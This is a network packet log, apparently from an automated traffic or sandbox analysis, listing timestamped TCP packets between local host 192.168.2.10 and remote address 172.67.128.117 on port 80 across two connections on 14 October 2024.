                                                      Oct 14, 2024 11:06:10.826409101 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.826423883 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.826452017 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.826493025 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827038050 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827059031 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827069998 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827157021 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827159882 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827168941 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827181101 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827192068 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827210903 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827234030 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827322006 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827373028 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827375889 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827392101 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827403069 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827456951 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827476025 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827497005 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827510118 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827537060 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827605009 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827608109 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827616930 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827632904 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827699900 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827749014 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827759027 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827771902 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827780962 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827812910 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827835083 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.827912092 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827923059 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827934980 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.827971935 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.828002930 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.828012943 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.828023911 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.828035116 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.828051090 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.828051090 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.828099012 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830259085 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830270052 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830281019 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830291986 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830328941 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830363035 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830372095 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830374956 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830395937 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830405951 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830419064 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830430031 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830440044 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830441952 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830467939 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830486059 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830497026 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830513000 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830527067 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830534935 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830534935 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830563068 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830889940 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830902100 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830913067 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830961943 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830961943 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.830980062 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830991030 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.830996037 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831002951 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831084967 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831094027 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.831096888 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831108093 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831119061 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831137896 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831151009 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831162930 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831168890 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.831187010 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.831551075 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831563950 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831576109 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831584930 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.831612110 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.831660986 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877305984 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877376080 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877394915 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877407074 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877418041 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877437115 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877440929 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877440929 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877458096 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877470016 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877480984 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877492905 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877504110 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877504110 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877521038 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877532005 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877538919 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877557993 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877559900 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877568960 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877592087 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877602100 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877613068 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877613068 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877624989 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877638102 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877649069 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877666950 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877667904 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877679110 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.877692938 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.877736092 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.878355026 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.878376007 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.878422976 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.916486025 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916544914 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916579962 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916631937 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916635036 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.916685104 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916743994 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916770935 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.916783094 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916810036 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.916836977 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916866064 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916898012 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916932106 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916941881 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.916963100 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.916975975 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.916996002 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917000055 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917028904 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917062998 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917097092 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917126894 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917129040 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917146921 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917161942 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917192936 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917232037 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917242050 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917325020 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917376041 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917397976 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917407990 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917459011 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917493105 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917514086 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917514086 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917527914 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917576075 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917582989 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917618990 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917671919 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917723894 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917757034 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917778969 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917778969 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917788982 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917823076 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917855024 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917889118 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917903900 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917903900 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.917917967 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917952061 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.917984009 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918004990 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918019056 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918040991 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918052912 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918086052 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918107986 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918118954 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918206930 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918478012 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918561935 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918592930 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918618917 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918643951 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918694973 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918726921 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918747902 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918780088 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918812990 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918823957 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918847084 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918879032 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918910980 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918920994 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918920994 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.918945074 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.918977976 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.919009924 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.919043064 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.919078112 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.919096947 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.919096947 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.919178963 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.919871092 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.919924021 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.919962883 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920011997 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920037031 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920044899 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920104980 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920137882 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920146942 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920146942 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920170069 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920206070 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920238018 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920259953 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920273066 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920279980 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920305014 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920339108 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920372009 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920407057 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920414925 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920414925 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920435905 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920495033 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.920876980 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920932055 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920962095 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.920989990 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921015024 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921066046 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921127081 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921169996 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921169996 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921176910 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921343088 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921401024 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921416044 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921446085 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921475887 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921508074 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921540976 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921542883 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921574116 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921607018 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921612024 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921641111 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.921669006 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.921690941 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922269106 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922303915 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922336102 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922405005 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922410011 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922461987 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922493935 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922528028 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922540903 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922542095 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922560930 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922594070 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922625065 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922657967 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922668934 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922668934 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922691107 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922724009 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922758102 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.922822952 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.922822952 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.966427088 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966448069 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966458082 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966521025 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966531992 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966542959 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966552973 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966564894 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966583014 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.966583014 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.966607094 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966619015 CEST8049716172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:10.966660023 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:10.966660023 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:15.517535925 CEST4971680192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:53.681305885 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:53.686220884 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:53.686335087 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:53.686415911 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:53.691467047 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412334919 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412348032 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412364006 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412380934 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412389994 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412405014 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412414074 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412420988 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.412422895 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412483931 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412491083 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.412496090 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.412496090 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.412569046 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.417289972 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.417331934 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.417365074 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.417453051 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.504813910 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.504852057 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.504861116 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.504878044 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.504887104 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505024910 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.505024910 CEST4997580192.168.2.10172.67.128.117
                                                      Oct 14, 2024 11:06:54.505193949 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505245924 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505253077 CEST8049975172.67.128.117192.168.2.10
                                                      Oct 14, 2024 11:06:54.505295038 CEST4997580192.168.2.10172.67.128.117
